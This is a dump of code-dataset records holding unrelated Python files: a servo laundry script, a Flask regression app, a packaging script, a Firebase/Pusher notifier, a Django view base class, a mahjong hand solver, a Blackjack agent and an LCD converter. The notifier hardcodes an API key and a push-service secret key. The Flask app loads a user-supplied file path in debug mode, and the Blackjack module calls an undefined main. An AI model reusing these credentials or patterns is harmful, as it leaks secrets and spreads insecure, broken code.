str(UriBuilder(path=\"/v1/debug/flood/rpc\"))\n return request.rest_request(conninfo, credentials, method, uri)\n","sub_path":"sales-demo/qumulo/rest/flood.py","file_name":"flood.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"509611269","text":"import time\nimport pigpio\nimport firebase_module\n\ndef StartLaundry():\n #fb = firebase_module.firebase(\"store\")\n #fb.cancel()\n servoPush()\n time.sleep(SERVO_TIME)\n servoRelease()\n\ndef calcServoDuty(ratio): # ratio:0-1でサーボ角度を指定\n # SG92Rの制御パルスが0.5ms-2.4msなのでdutyに25000(1000000/20*0.5)-120000(100000/20*2.4)をマッピングする\n duty = 25000 + (120000 - 25000) * ratio\n return duty\n\ndef moveServo(ratio):\n duty = calcServoDuty(ratio)\n pi.hardware_PWM(PORT_PWM, SERVO_PERIOD, int(duty))\n\ndef servoRelease():\n moveServo(SERVO_RELEASE)\n\ndef servoPush():\n moveServo(SERVO_PUSH)\n\nif __name__=='__main__':\n # サーボのPWMパラメータ\n SERVO_RELEASE = 0.6 # ボタン解放状態(サーボモータ角度中間)\n SERVO_PUSH = 0.40 # ボタン押下状態\n SERVO_TIME = 1 # サーボモータを押す時間[秒]\n \n pi = pigpio.pi()\n \n # servo setting\n PORT_PWM = 18\n SERVO_PERIOD = 50 # [Hz] :PWMサイクル20ms\n pi.set_mode(PORT_PWM, pigpio.OUTPUT)\n moveServo(0.5)\n \n \n StartLaundry()\n","sub_path":"rpi-src/laundry/servo.py","file_name":"servo.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"590214776","text":"from flask import Flask,render_template, request, redirect\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LinearRegression\r\nimport pandas as pd\r\nfrom io import BytesIO\r\nimport base64\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n return render_template(\"index.html\")\r\n\r\n@app.route('/plot', methods =[\"GET\", \"POST\"])\r\ndef salary():\r\n if request.method == \"POST\":\r\n mycsv = request.form.get(\"mycsv\")\r\n eliminate = request.form.get(\"eliminate\")\r\n eliminated = eliminate.split(',')\r\n target = request.form.get(\"target\")\r\n eliminated.append(target)\r\n \r\n\r\n img = BytesIO()\r\n df = pd.read_csv(mycsv)\r\n\r\n X = df.drop(eliminated,axis=1)\r\n y = df[target]\r\n\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=101)\r\n\r\n lm = LinearRegression()\r\n lm.fit(X_train,y_train)\r\n\r\n predictions = lm.predict(X_test)\r\n plt.scatter(y_test,predictions)\r\n plt.xlabel('y_test')\r\n plt.ylabel('My_predictions')\r\n plt.title('Scatter Plot')\r\n\r\n score = lm.score(X_test,y_test)\r\n score = score*100\r\n score = str(score)\r\n\r\n plt.savefig(img, format='png')\r\n plt.close()\r\n img.seek(0)\r\n plot_url = base64.b64encode(img.getvalue()).decode('utf8')\r\n\r\n return render_template(\"plot.html\", plot_url = plot_url,accuracy=score)\r\n \r\napp.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"474017765","text":"import os \nimport shutil\n\nimport xml\nimport xml.etree.ElementTree as ET\nimport re\n\n\nSCRIPT_DIR = os.path.dirname(__file__)\nROOT_DIR = os.path.abspath(os.path.join(__file__ ,\"..\",\"..\"))\n\nCLIENT_DIR = os.path.join(ROOT_DIR, \"Client\")\nSERVER_DIR = os.path.join(ROOT_DIR, \"Server\")\n\nJRE_PATH = os.path.join(SCRIPT_DIR, \"application\", \"jre\")\n\nLAUNCH4J_CONFIGS = os.path.join(SCRIPT_DIR, \"launch4j_build_configs.xml\")\n\ndef read_output_path(xml_file):\n \"\"\"\n Reads the launch4j config file, and returns the .exe output path\n \"\"\"\n tree = ET.parse(xml_file)\n root = tree.getroot()\n\n string= str(xml.etree.ElementTree.tostring(root))\n\n pattern = \"(.*)\"\n x = os.path.normpath(re.findall(pattern, string, flags= re.S)[0])\n return os.path.abspath(x)\n\ndef read_jre_path(xml_file):\n \"\"\"\n Reads the launch4j config file, and returns the path of the bundled jre\n \"\"\"\n tree = ET.parse(xml_file)\n root = tree.getroot()\n\n string= str(xml.etree.ElementTree.tostring(root))\n\n pattern = \".*(.*)\"\n x = os.path.normpath(re.findall(pattern, string, flags= re.S)[0])\n return os.path.abspath(x)\n\n\nif __name__ == \"__main__\":\n\n print(\"+===========================================+\")\n print(\"| WINDOWS .EXE PACKAGING SCRIPT ver1.0 |\")\n print(\"+===========================================+\")\n \n output_dir = os.path.abspath(os.path.join(os.path.dirname(read_output_path(LAUNCH4J_CONFIGS)), \"..\"))\n assert os.path.exists(output_dir), f\"ERROR: bad path {output_dir}\"\n\n #jre_path = read_jre_path(LAUNCH4J_CONFIGS)\n jre_path = JRE_PATH\n assert os.path.exists(jre_path), f\"ERROR: bad path {jre_path}\"\n assert len(os.listdir(jre_path)) > 3, \"ERROR: jre files are missing! Please ensure that '/application/jre/bin' is a valid path\"\n\n print(\"Copying Client Resources and Classes...\")\n client_classes = os.path.join(CLIENT_DIR, \"target\", \"classes\")\n client_resources = os.path.join(CLIENT_DIR, \"resources\")\n\n client_out = os.path.join(output_dir, \"Client\")\n\n shutil.copytree(client_classes, os.path.join(client_out, \"classes\"))\n shutil.copytree(client_resources, os.path.join(client_out, \"resources\"))\n\n print(\"Copying Server Resources and Classes...\")\n server_classes = os.path.join(SERVER_DIR, \"target\", \"classes\")\n server_resources = os.path.join(SERVER_DIR, \"resources\")\n\n server_out = os.path.join(output_dir, \"Server\")\n\n shutil.copytree(server_classes, os.path.join(server_out, \"classes\"))\n shutil.copytree(server_resources, os.path.join(server_out, \"resources\"))\n\n print(\"Copying Resources...\")\n resources = os.path.join(ROOT_DIR, \"resources\")\n resources_out = os.path.join(output_dir, \"resources\")\n\n shutil.copytree(resources, resources_out)\n\n print(\"Installation Script Complete.\")","sub_path":"Build_exe/package_script.py","file_name":"package_script.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"120494728","text":"import pyrebase\nfrom pusher_push_notifications import PushNotifications\n\nconfig = {\n 'apiKey': \"AIzaSyBpu5QxBlcfKqaIemP7XE9Ls5I0enEM0ZA\",\n 'authDomain': \"espe-452bd.firebaseapp.com\",\n 'databaseURL': \"https://espe-452bd.firebaseio.com\",\n 'projectId': \"espe-452bd\",\n 'storageBucket': \"espe-452bd.appspot.com\",\n 'messagingSenderId': \"223433065996\"\n }\n\nfirebase = pyrebase.initialize_app(config)\n\ndb = firebase.database()\npn_client = PushNotifications(\n instance_id='6211a6b6-62d9-4cc2-82de-77b831347c0d',\n secret_key='5710026DFC0CC0A41C58BD2AA9937F1',\n)\n\ndef stream_handler(message):\n print(message)\n if(message['data'] is 1):\n response = pn_client.publish(\n interests=['hello'],\n publish_body={\n 'apns': {\n 'aps': {\n 'alert': 'Hello!',\n },\n },\n 'fcm': {\n 'notification': {\n 'title': 'VOID ALERT',\n 'body': 'PORTA ABERTA',\n },\n },\n },\n )\n\n print(response['publishId'])\nmy_stream = db.child(\"alarm1\").stream(stream_handler,None)","sub_path":"pusher4.py","file_name":"pusher4.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"602941118","text":"import json\n\nfrom django.views import View\nfrom django.http import JsonResponse\n\nfrom api.v1.utils.exceptions import FailedToCreateException, UpdateException, DeleteException\nfrom api.v1.utils.filters import BaseFilter\nfrom api.v1.utils.helpers import to_json\nfrom api.v1.utils.api_helpers import APIHelpers\nfrom api.v1.utils.constants import (\n MAX_RESULTS_PER_RESPONSE,\n)\n\n\nclass BaseModelView(View):\n def __init__(self, model, *args, **kwargs):\n super(BaseModelView, self).__init__(*args, **kwargs)\n self.model = model\n self.model_filter = kwargs.pop('model_filter', BaseFilter)()\n\n @property\n def model(self):\n return getattr(self, '_model')\n\n @model.setter\n def model(self, value):\n if not value:\n raise ValueError(\"Model cannot be None\")\n else:\n setattr(self, '_model', value)\n\n @staticmethod\n @APIHelpers.check_if_entity_exists\n def base_find_by_id(model, model_id):\n result = model.find({\n \"id\": model_id\n })\n data = to_json(result)[0]\n return data\n\n @staticmethod\n def base_get(model, model_filter=None, *args, **kwargs):\n skip = int(kwargs.pop('skip', 0))\n limit = int(kwargs.pop('limit', 25))\n paginate = kwargs.pop('paginate', True)\n only = kwargs.pop('only', None)\n sort = kwargs.pop('sort', None)\n search = kwargs.pop('search', None)\n if search:\n query = model_filter.get_filters(search)\n else:\n query = dict(**kwargs)\n\n if paginate == 'false' or paginate is False:\n limit = MAX_RESULTS_PER_RESPONSE\n\n results = model.find(\n query, skip=skip, limit=limit,\n projection=only, sort=sort)\n\n data = to_json(results)\n return JsonResponse({\n \"success\": True,\n \"data\": data,\n \"total\": results.count()\n }, status=APIHelpers.OK)\n\n @staticmethod\n def base_post(model, data):\n instance_id = model.create(data)\n if instance_id:\n return JsonResponse({\n \"success\": True,\n \"data\": BaseModelView.base_find_by_id(model, instance_id)\n }, status=APIHelpers.CREATED)\n raise FailedToCreateException()\n\n @staticmethod\n @APIHelpers.check_if_entity_exists\n def base_put(model, model_id, data):\n result = model.update(model_id, data)\n if result['Modified']:\n return JsonResponse({\n \"success\": True,\n \"data\": [BaseModelView.base_find_by_id(model, model_id)],\n \"total\": 1\n }, status=APIHelpers.OK)\n return UpdateException()\n\n @staticmethod\n @APIHelpers.check_if_entity_exists\n def base_patch(model, model_id, data):\n result = model.patch(model_id, data)\n if result['ok']:\n return JsonResponse({\n \"success\": True,\n \"data\": [BaseModelView.base_find_by_id(model, model_id)],\n \"total\": 1\n }, status=APIHelpers.OK)\n return UpdateException()\n\n @staticmethod\n @APIHelpers.check_if_entity_exists\n def base_delete(model, model_id):\n result = model.delete(model_id)\n if result['ok']:\n return JsonResponse({\n \"success\": True,\n }, status=APIHelpers.SUCCESSFULLY_DELETED)\n raise DeleteException()\n\n @APIHelpers.handle_api_exceptions\n def get(self, request):\n return BaseModelView.base_get(self.model, self.model_filter, **request.GET.dict().copy())\n\n @APIHelpers.handle_api_exceptions\n def post(self, request):\n body = json.loads(request.body)\n return BaseModelView.base_post(self.model, body)\n\n\nclass BaseModelDetailView(View):\n @property\n def model(self):\n return getattr(self, '_model')\n\n @model.setter\n def model(self, value):\n if not value:\n raise ValueError(\"Model cannot be None\")\n else:\n setattr(self, '_model', value)\n\n def __init__(self, model, *args, **kwargs):\n super(BaseModelDetailView, self).__init__(*args, **kwargs)\n self.model = model\n self.model_filter = kwargs.pop('model_filter', BaseFilter)()\n\n @APIHelpers.handle_api_exceptions\n def get(self, request, **kwargs):\n model_id = kwargs['id']\n return BaseModelView.base_get(self.model, id=model_id)\n\n @APIHelpers.handle_api_exceptions\n def put(self, request, **kwargs):\n model_id = kwargs['id']\n body = json.loads(request.body)\n return BaseModelView.base_put(self.model, model_id, body)\n\n @APIHelpers.handle_api_exceptions\n def patch(self, request, **kwargs):\n model_id = kwargs['id']\n body = json.loads(request.body)\n return BaseModelView.base_patch(self.model, model_id, body)\n\n @APIHelpers.handle_api_exceptions\n def delete(self, request, **kwargs):\n model_id = kwargs['id']\n return BaseModelView.base_delete(self.model, model_id)\n","sub_path":"services/inventory/src/services/web/api/v1/utils/base_model_view.py","file_name":"base_model_view.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"518620785","text":"import sys\nfrom graphManager import GraphManager\nfrom os import getcwd, makedirs\nfrom os.path import join, basename\nimport networkx as nx\nfrom amberNode import AmberNode\nfrom fDynamoJobNode import FDynamoNode\nfrom parsers import parseFDynamoCompileScript\nfrom shutil import copyfile, move\nfrom QMMMsetupNode import QMMMsetupNode\nfrom jobNode import JobNode\n\ndef solventInLine(line):\n if \"WAT\" in line:\n return True\n \n if \"CL-\" in line:\n return True\n \n if \"NA+\" in line:\n return True\n \ndef countNoSolventInLine(line):\n noSolvent = 0\n \n for res in line.split():\n if not res in [ \"WAT\" , \"NA+\", \"CL-\" ]:\n noSolvent += 1\n \n return noSolvent\n\ndef getNumberOfNotSolventRes(topologyFile):\n noSolventRes = 0\n \n topF = open(topologyFile, 'r')\n \n line = topF.readline()\n \n while line and not \"%FLAG RESIDUE_LABEL\" in line:\n line = topF.readline()\n \n topF.readline()\n line = topF.readline().upper()\n \n while not solventInLine(line):\n noSolventRes += countNoSolventInLine(line)\n line = topF.readline().upper()\n \n noSolventRes += countNoSolventInLine(line)\n topF.close()\n \n return noSolventRes\n\n\ndef generateGraph(topologyFile, forcefield, compileScript, coordinates):\n jobGraph = nx.DiGraph()\n rootDir = getcwd()\n \n notSolventNo = getNumberOfNotSolventRes(topologyFile)\n\n data = parseFDynamoCompileScript(compileScript)\n\n newNode = JobNode(None, rootDir)\n newNode.status = \"finished\"\n jobGraph.add_node(rootDir, data = newNode)\n\n for crd in coordinates:\n coolDirName = join( rootDir, basename(crd).replace(\".\", \"_\") )\n makedirs(coolDirName)\n\n copyfile( join( rootDir, basename(topologyFile) ), join(coolDirName, basename(topologyFile)) )\n move( join( rootDir, basename(crd) ), join(coolDirName, basename(crd)) )\n\n coolNode = AmberNode(\"amber.slurm\", coolDirName, coolDirName, basename(topologyFile), basename(crd))\n coolNode.runType = \"standardCooling\"\n coolNode.time = \"1:00:00\"\n coolNode.partition = \"plgrid-short\"\n coolNode.processors = 8\n jobGraph.add_node( coolDirName, data = coolNode )\n jobGraph.add_edge(rootDir, coolDirName)\n\n optimDir = join( coolDirName, \"MM_opt\")\n optimNode = AmberNode(\"amber.slurm\", optimDir, optimDir, topologyFile)\n optimNode.NoSolventResidues = notSolventNo\n optimNode.runType = \"standardOptimization\"\n optimNode.time = \"1:00:00\"\n optimNode.partition = \"plgrid-short\"\n jobGraph.add_node( optimDir, data = optimNode )\n jobGraph.add_edge( coolDirName, optimDir)\n\n qmmmSetupDirName = join( coolDirName, \"QMMM_setup\")\n qmmmSetupNode = QMMMsetupNode(\"qmmmSetup.slurm\", qmmmSetupDirName, basename(topologyFile), \"cooled.nc\")\n jobGraph.add_node( qmmmSetupDirName, data = qmmmSetupNode )\n jobGraph.add_edge( optimDir, qmmmSetupDirName)\n\n qmmmOptDir = join(qmmmSetupDirName, \"opt\")\n makedirs(qmmmOptDir)\n copyfile( join( rootDir, basename(forcefield) ), join(qmmmOptDir, basename(forcefield)) )\n\n definedAtoms = data[\"definedAtoms\"]\n constraints = data[\"constraints\"]\n qmmmOptNode = FDynamoNode(data[\"inputFile\"], qmmmOptDir)\n qmmmOptNode.coordsIn = \"coordsIn.crd\"\n qmmmOptNode.coordsOut = \"coordsOut.crd\"\n qmmmOptNode.verification = [ \"Opt\" ]\n qmmmOptNode.slurmFile = None\n qmmmOptNode.autorestart = False\n qmmmOptNode.forceField = data[\"forceField\"]\n qmmmOptNode.flexiblePart = data[\"flexiblePart\"]\n qmmmOptNode.sequence = data[\"sequence\"]\n qmmmOptNode.qmSele = data[\"qmSele\"]\n qmmmOptNode.templateKey = \"QMMM_opt_mopac_no_hess\"\n qmmmOptNode.fDynamoPath = data[\"fDynamoPath\"]\n qmmmOptNode.charge = data[\"charge\"]\n qmmmOptNode.method = data[\"method\"]\n\n jobGraph.add_node( qmmmOptDir, data = qmmmOptNode )\n jobGraph.add_edge( qmmmSetupDirName, qmmmOptDir)\n\n qmmmScanDir = join(qmmmSetupDirName, \"scan\")\n qmmmScanNode = FDynamoNode(\"scan.f90\", qmmmScanDir)\n qmmmScanNode.verification = [ \"scan1D\" ]\n qmmmScanNode.readInitialScanCoord = True\n qmmmScanNode.templateKey = \"QMMM_scan1D_mopac\"\n qmmmScanNode.additionalKeywords = { \"scanDir\" : \"+\", \"coordScanStart\" : \"\" ,\n \t\"iterNo\" : \"80\", \"definedAtoms\" : definedAtoms, \"constraints\" : constraints }\n\n jobGraph.add_node( qmmmScanDir, data = qmmmScanNode )\n jobGraph.add_edge( qmmmOptDir, qmmmScanDir)\n\n qmmmTSoptDir = join(qmmmSetupDirName, \"ts_search\")\n qmmmTSoptNode = FDynamoNode(\"tsSearch.f90\", qmmmTSoptDir)\n qmmmTSoptNode.verification = [\"Opt\" , \"Freq\"]\n qmmmTSoptNode.noOfExcpectedImaginaryFrequetions = 1\n qmmmTSoptNode.templateKey = \"QMMM_opt_mopac\"\n qmmmTSoptNode.additionalKeywords = { \"ts_search\" : \"true\" }\n qmmmTSoptNode.coordsIn = \"coordsStart.crd\"\n qmmmTSoptNode.coordsOut = \"coordsDone.crd\"\n\n jobGraph.add_node( qmmmTSoptDir, data = qmmmTSoptNode )\n jobGraph.add_edge( qmmmScanDir, qmmmTSoptDir)\n\n return jobGraph\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 5:\n print(\"graphMassiveQMMMsetup topology file, forcefield, compile script, amber coordinates\")\n else:\n sm = GraphManager()\n currentDir = getcwd()\n graph = sm.isGraphHere(currentDir)\n \n topology = sys.argv[1]\n forcefield = sys.argv[2]\n compileScript = sys.argv[3]\n coordinates = sys.argv[4:]\n if not graph:\n newGraph = generateGraph(topology, forcefield, compileScript, coordinates)\n \n result = sm.addGraph(newGraph, currentDir)\n if result:\n sm.buildGraphDirectories(newGraph)\n sm.saveGraphs()\n print(\"Created new graph\")\n else:\n print(\"Cannot create more than one graph in the same directory\")","sub_path":"massiveQMMMsetup.py","file_name":"massiveQMMMsetup.py","file_ext":"py","file_size_in_byte":6039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"51649830","text":"import json\n\ndef parseToSong(string):\n temp = string.split(\",\")\n print (temp)\n\nclass Song:\n '''\n Initiates a song object. \n Args [info, past, present, future, added in]\n info : dictionary\n {\n name: \"name\",\n composer: \"composer\"\n }\n past/present/future: dictionary \n {\n diff: [1-11],\n scorepoten: [0.00-11.2],\n notecount: [0-1450]\n }\n '''\n def __init__ (self, name, comp, pst, prs, ftr, incl):\n self.name = name\n self.comp = comp\n self.pst = pst\n self.prs = prs\n self.ftr = ftr\n self.incl = incl\n \n def outAsString(self):\n out = {\n \"name\": self.name,\n \"composer\": self.comp,\n \"past\": self.pst,\n \"present\": self.prs,\n \"future\": self.ftr,\n \"incl\": self.incl\n }\n return json.dumps(out, indent=4)\n \n def print(self):\n print (self.outAsString())","sub_path":"lib/SongClass.py","file_name":"SongClass.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"295201743","text":"\"\"\"Monte Carlo Control for the game of Blackjack.\n\nUses the OpenAI Gym Blackjack environment.\n\"\"\"\nimport collections\nimport gym\nimport numpy as np\nimport typing\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\n\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_integer(\n 'num_episodes', 10,\n 'The number of episodes to run.')\nflags.DEFINE_bool(\n 'casino_blackjack_reward', True,\n 'If True, the reward for a natural hand (an Ace and a 10 or face card) is '\n '1.5. Else the reward for the natural hand is the same as for a winning '\n 'hand, 1.0.')\n\n# The observation space is player score, dealer score, and whether or not there\n# is a usable ace in the player's hand. A usable ace means that the sum of the\n# hand with an Ace value of 11 is <= 21.\nobservation_t = typing.Tuple[int, int, bool]\nObservation = collections.namedtuple(\n 'Observation', ['player_score', 'dealer_score', 'usable_ace'])\n\n# The action space is a single bool, either True to hit, or False to stick.\naction_t = bool\n\n# A single step includes the observation, the selected action, and its reward.\nstep_t = typing.Tuple[Observation, action_t, float]\nStep = collections.namedtuple(\n 'Step', ['observation', 'action', 'reward'])\n\n\nclass MonteCarloControlBlackjack(object):\n \"\"\"A Monte Carlo Control \"agent\" for the game of Blackjack.\"\"\"\n\n def __init__(self, casino_blackjack_reward: bool,\n policy: typing.Callable[[Observation], action_t]):\n \"\"\"Create the agent.\n\n Args:\n casino_blackjack_reward: If True, the reward for a natural blackjack is\n 1.5.\n policy: A callback which accepts an Observation and returns True to Hit,\n or False to stick.\n \"\"\"\n self.environment = gym.make('Blackjack-v0')\n self.environment.natural = casino_blackjack_reward\n self.policy = policy\n # Value table. The dimensions are: [player_score, dealer_score, usable_ace]\n self.N = np.zeros([21, 10, 2], dtype=np.int32)\n self.S = np.zeros([21, 10, 2], dtype=np.float)\n self.V = np.zeros([21, 10, 2], dtype=np.float)\n # The total number of episodes.\n self.num_episodes = 0\n\n def Reset(self):\n \"\"\"Reset the internal state.\"\"\"\n self.N.fill(0)\n self.S.fill(0)\n self.V.fill(0)\n self.num_episodes = 0\n\n def GetAnEpisode(self) -> typing.List[Step]:\n \"\"\"Run an episode.\n\n The first step is the game opening. The action and reward are both None.\n\n Returns:\n A list of Step tuples.\n \"\"\"\n done = False\n steps = [Step(Observation(*self.environment.reset()), None, None)]\n while not done:\n action = self.policy(steps[-1].observation)\n obs_, reward_, done, _ = self.environment.step(action)\n steps.append(Step(Observation(*obs_), action, reward_))\n return steps\n\n def Run(self, n: int):\n for i in range(n):\n self.num_episodes += 1\n episode = self.GetAnEpisode()\n logging.debug(\n 'Episode %d, steps = %d, final_score = %02d:%02d, reward = %.1f',\n i, len(episode), episode[-1].observation.player_score,\n episode[-1].observation.dealer_score, episode[-1].reward)\n for j in range(1, len(episode)):\n step = episode[j]\n indices = (step.observation.player_score - 1,\n step.observation.dealer_score - 1,\n 1 if step.observation.usable_ace else 0)\n if j < len(episode) - 1:\n self.N[indices] += 1\n self.S[indices] += sum(\n episode[k].reward for k in range(j, len(episode)))\n self.V[indices] = self.S[indices] / self.N[indices]\n\n\nif __name__ == '__main__':\n app.run(main)\n","sub_path":"learn/reinforcement_learning/monte_carlo_control_blackjack.py","file_name":"monte_carlo_control_blackjack.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"623287296","text":"\nfrom collections import Counter\nimport copy\n\nclass Option: # each options catagotized by all possible pairs e.g. pair = [3,3] leftovers = [3,4,5,6,7,8,9,9,9]\n def __init__(self, pair, threes, series,leftovers):\n self.pair = pair\n self.threes = threes\n self.series = series\n self.leftovers = leftovers\n\n def __repr__(self):\n return \"Pair: \" + str(self.pair) + \" Sets: \" + str(self.threes) + \" Sequences: \" + str(self.series) + \" Left: \" + str(self.leftovers)\n\n def __str__(self):\n return \"Pair: \" + str(self.pair) + \" Sets: \" + str(self.threes) + \" Sequences: \" + str(self.series) + \" Left: \" + str(self.leftovers)\n\n#please ignore the following assignments\nDragons = [100]\nOnes = [1,10,20]\nNines = [9,19,29]\nTiles = [1,2,3,4,5]\nTiles_Raw = [1,2,3,4,5]\nhas_one_nine = False\nhas_gang = False\n\n\n\ndef Get_Pairs(tiles):\n pairs = []\n for t in set(tiles):\n if tiles.count(t) >= 2:\n pairs.append([t, t])\n return pairs\n\ndef Get_Threes(tiles):\n sets = []\n for t in set(tiles):\n if tiles.count(t) >= 3:\n sets.append([t, t, t])\n return sets\n\ndef Get_Series(tiles):\n # returns a list of all the sequences\n series = []\n \n tiles_no_dup = sorted(list(set(tiles)))\n temp = [[tiles_no_dup[0]]]\n\n for i in range (1,len(tiles_no_dup)):\n prev_tile = tiles_no_dup[i-1]\n\n if tiles_no_dup[i] != prev_tile+1:\n temp = [[tiles_no_dup[i]]]\n continue\n\n temp_series = [] \n for t in temp:\n t.append(tiles_no_dup[i]) #adding the valid element above to the current series in progress\n if len(t) != 3:\n temp_series.append(t) #adding current element to a temporary series\n else:\n series.append(t) #once reached length 3 the temp series gets added\n temp = temp_series\n temp.append([tiles_no_dup[i]])\n\n return series\n\ndef Map_Remainings(patterns_found, tiles): # combos are a collection of existed pairs or sequences, \n #this fcn removes them from the overall list, and returns the mapping of patterns and their corresponding leftovers\n\n collections = []\n for pattern in patterns_found:\n leftovers = copy.deepcopy(tiles)\n\n for p in pattern:\n leftovers.remove(p)\n collections.append((pattern, leftovers))\n\n return collections\n\ndef find_winning_hand(tiles):\n options = []\n winning_hand = []\n completed = []\n\n pairs = Get_Pairs(tiles)\n collections_by_pairs = Map_Remainings(pairs, tiles)\n\n #create all collections for each pulling one pair out cases\n for c in collections_by_pairs:\n options.append(Option([c[0]],[],[], c[1]))\n\n while len(options) > 0:\n option = options.pop(0)\n three_combos = Get_Threes(option.leftovers)\n if len(three_combos) != 0:\n possi = Map_Remainings(three_combos, option.leftovers)\n for p in possi:\n threes = copy.deepcopy(option.threes)\n threes.append(p[0])\n new_option = Option(option.pair, threes, option.series, p[1])\n if len(p[1]) == 0:\n s_defined = copy.deepcopy(threes)\n s_defined.extend(option.series)\n s_defined = sorted(s_defined)\n if not(s_defined in completed):\n winning_hand.append(new_option)\n completed.append(s_defined)\n continue\n options.append(new_option)\n\n series_combos = Get_Series(option.leftovers)\n if len(series_combos) != 0:\n possi = Map_Remainings(series_combos, option.leftovers)\n for p in possi:\n series = copy.deepcopy(option.series)\n series.append(p[0])\n new_option = Option(option.pair, option.threes, series, p[1])\n if len(p[1]) == 0:\n s_defined = copy.deepcopy(series)\n s_defined.extend(option.threes)\n s_defined = sorted(s_defined)\n if not(s_defined in completed):\n winning_hand.append(new_option)\n completed.append(s_defined)\n continue\n options.append(new_option)\n\n real_wins = []\n for wh in winning_hand:\n if len(wh.series) == 0 or len(wh.threes) == 0:\n continue\n real_wins.append(wh)\n return real_wins\n\ntiles = [2,3,4,6,7,8,9,9,11,11,11] #TODO deal with gang situation removed cases\nprint(find_winning_hand(tiles))\n\ndef Get_Adjacents(target):\n #takes a single target, and return valid, sorted connections that exists in the tiles\n adjacents = []\n\n if target not in Tiles:\n return adjacents\n\n if target in Dragons:\n return adjacents\n\n if target in Ones:\n\n if target+1 in Tiles:\n adjacents.append(target+1)\n \n return adjacents\n\n if target in Nines:\n\n if target-1 in Tiles:\n adjacents.append(target-1)\n\n return adjacents\n\n if target+1 in Tiles:\n adjacents.append(target+1)\n\n if target-1 in Tiles:\n adjacents.append(target-1)\n\n return (sorted(adjacents))\n\n\ndef One_Nine_Check(tiles):\n tile_dict = Counter(tiles)\n #if tile_dict.keys[] contains 1 or 9 tiles\n\n# winning hand conditions should have the pattern:\n\n# * requirement: already kou ting\n\n# mo bao win - draw tile the same as treasure\n# OR\n# normal win:\n # 1. one pair\n # 2. three of a kind (or four)\n # 3. one series\n # 4. everything else is either pattern 2 or 4\n # 5. all tiles should contains at least a 1 or 9\n\n\n# note that the possible winning hand only allows the number of tiles of 14 - 17 (maximum three \"Gangs\")\n\n#cases to pay attention to:\n # a three of a kind might not be used as a three of a kind, it might be a pair plus an a tile that belongs to a series\n # to avoid the case above check for series first, then pick pair, then the rest should all be three of a kind (or Gang)\n\n # mo Bao have in complete winning hands is a win\n # 7 pairs allowed?\n\n\n","sub_path":"pkg/harbin/Winning.py","file_name":"Winning.py","file_ext":"py","file_size_in_byte":6200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"545706564","text":"'''\nCreated on 1 Dec 2012\n\n@author: tony\n'''\n\n\n# pseudo code:\n# if number < 2:\n# \"add it to the first place of binary list\"\n# else:\n# temp = number % 2\n# \"add temp to the last place of binay list\"\n# call this function (number // 2, binary_list)\ndef itob(num,binary_list):\n if num<2 :\n binary_list.insert(0,num)\n else:\n tmp=num%2\n binary_list.append(tmp)\n itob(num//2,binary_list)\n return binary_list\n \ndef complete_display_list(target_binary_list):\n if len(target_binary_list)<8:\n target_binary_list.insert(0,0)\n complete_display_list(target_binary_list)\n \n return target_binary_list\n\ndef convert_data_to_display(data_list):\n display_list=[]\n \n for i in range(len(data_list)):\n binary_list_tmp=[]\n tmp = itob(data_list[i],binary_list_tmp)\n complete_display_list(tmp)\n display_list.extend(tmp)\n return display_list\n\ndef convert_display_list_to_lcd_list_temp(display_list):\n\n lcd_temp=[[0 for col in range(32)] for row in range(32)]\n lcd_list_temp=[[0 for col in range(32)] for row in range(32)]\n \n for col in range(32):\n for row in range(32):\n lcd_temp[col][row]=display_list[col*32+row]\n \n for col in range(32):\n for row in range(32):\n lcd_list_temp[row][col]=lcd_temp[col][row]\n \n return lcd_list_temp\n\n# Using this function, it will return a 4096 length list of 1 or 0, \ndef convert_to_lcd_display_list(data_list):\n lcd_list_temp = convert_display_list_to_lcd_list_temp(convert_data_to_display(data_list))\n lcd_list=[0]*4096\n \n for row in range(32):\n for col in range(32):\n temp=lcd_list_temp[col][row]\n lcd_list[(row*2)*64+col*2]=temp\n lcd_list[(row*2+1)*64+col*2]=temp\n lcd_list[(row*2+1)*64+col*2+1]=temp\n lcd_list[(row*2)*64+col*2+1]=temp\n \n return lcd_list\n\n\n\ndef convert_LCD_package_inv(lcd_list):\n lcd_package_list=[[0 for row in range(8)] for col in range(64)]\n\n for row in range(8):\n for col in range(64):\n # convert 8 'bit' to 1 Byte int\n int_temp=0\n for bit in range(8):\n int_temp+=lcd_list[(row*8+(7-bit))*64+col]*2^(7-bit)\n lcd_package_list[row][col]=int_temp\n\n return lcd_package_list\n ","sub_path":"Test/Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"482428084","text":"import os\nfrom datetime import timedelta\n\nbasedir = 